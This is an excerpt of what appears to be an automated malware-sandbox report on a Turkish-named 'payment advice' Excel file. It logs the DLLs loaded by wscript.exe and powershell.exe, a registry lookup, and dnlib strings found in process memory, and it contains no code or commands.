              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: mpr.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: propsys.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: apphelp.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: ntmarta.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64win.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: wow64cpu.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: atl.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: mscoree.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: version.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: cryptsp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: msisip.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: secur32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rpcrtremote.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: bcrypt.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: iphlpapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winnsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dnsapi.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc6.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: dhcpcsvc.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasapi32.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rasman.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: rtutils.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: winhttp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: webio.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: credssp.dllJump to behavior
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeSection loaded: amsi.dllJump to behavior
              Source: C:\Windows\SysWOW64\wscript.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\InprocServer32Jump to behavior
              Source: Window RecorderWindow detected: More than 3 window changes detected
              Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dllJump to behavior
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
              Source: #U00d6DEME TAVS#U0130YES#U0130.xlsStatic file information: File size 1104896 > 1048576
              Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetHandler source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
              Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 00000009.00000002.447875101.00000000034F9000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.451782581.00000000061C0000.00000004.08000000.00040000.00000000.sdmp
